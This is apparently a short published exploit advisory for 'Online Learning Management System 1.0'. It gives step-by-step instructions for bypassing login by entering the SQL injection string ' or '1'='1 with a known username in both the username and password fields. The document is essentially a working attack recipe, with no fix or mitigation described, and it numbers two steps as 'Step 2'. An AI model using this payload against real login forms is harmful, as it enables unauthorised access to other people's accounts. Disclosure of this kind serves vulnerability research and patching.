# Exploit Title: Online Learning Management System 1.0 - Authentication Bypass
# Exploit Author: Aakash Madaan (Godsky)
# Date: 2020-12-22
# Google Dork: N/A
# Vendor Homepage:
# Software Link:
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS
# Description: Easy authentication bypass vulnerability on the application allows an attacker to log in as the registered user without password.

Step 1: Go to http://localhost/ and register a new user or try to login as
already registered user (Ubas).

Step 2: On the login page, use query { Ubas' or '1'='1 } as username

Step 2: On the login page, use same query { Ubas' or '1'='1 } as password

All set you should be logged in as Ubas.